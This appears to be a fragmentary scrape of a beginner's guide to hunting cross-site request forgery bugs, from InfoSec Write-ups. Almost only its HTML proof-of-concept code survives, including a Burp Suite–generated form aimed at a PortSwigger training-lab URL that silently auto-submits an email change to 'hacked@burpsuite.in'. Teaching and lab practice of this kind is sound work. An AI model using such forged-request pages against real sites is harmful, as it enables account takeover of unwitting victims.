InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow publication

Unmasking Basic CSRF Bugs: Hunter Guide for Beginners

Vignesh
InfoSec Write-ups
Published in
5 min readMay 30, 2023

Hunting for CSRF

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="URL" method="POST">
<input type="hidden" name="email" value="id@mail.in" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://0a8800fd03f47b4580bab77.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="hacked@burpsuite.in" />
<input type="hidden" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
<script>
document.forms[0].submit();
</script>

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by Vignesh

Hi, I'm Vignesh just call me Vicky. I'm a cybersecurity Researcher who was more interested in this cybersecurity field basically I'm a Offsec Student.

No responses yet

Write a response